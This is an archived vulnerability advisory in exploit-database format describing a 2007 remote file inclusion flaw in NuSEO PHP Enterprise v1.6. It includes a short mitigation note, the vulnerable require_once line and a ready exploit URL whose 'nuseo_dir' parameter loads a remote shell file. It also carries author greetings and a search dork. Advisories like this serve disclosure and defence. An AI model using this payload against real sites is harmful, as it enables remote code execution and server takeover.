Remote File Inclusion in NuSEO PHP Enterprise.v1.6

vendor:

NuSEO PHP Enterprise

by:

BiNgZa

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: NuSEO PHP Enterprise

Affected Version From: NuSEO PHP Enterprise.v1.6

Affected Version To: NuSEO PHP Enterprise.v1.6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Remote File Inclusion in NuSEO PHP Enterprise.v1.6

The vulnerability is present in the file /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php. By manipulating the 'nuseo_dir' parameter in the URL, an attacker can include remote files from a different server, potentially leading to arbitrary code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before including files. Additionally, it is advised to avoid using remote file inclusion altogether.

Source

Exploit-DB raw data:

Vulnerability Type: Remote File Inclusion
Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuseo_dir
Line number: 268
Lines:

----------------------------------------------

require_once( $nuseo_dir . '/nuseo' . '_d.php' );
//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk'SEO by NuSEO.PHP'

shadowcrew@hotmail.co.uk

shadow.php0h.com

# milw0rm.com [2007-10-10]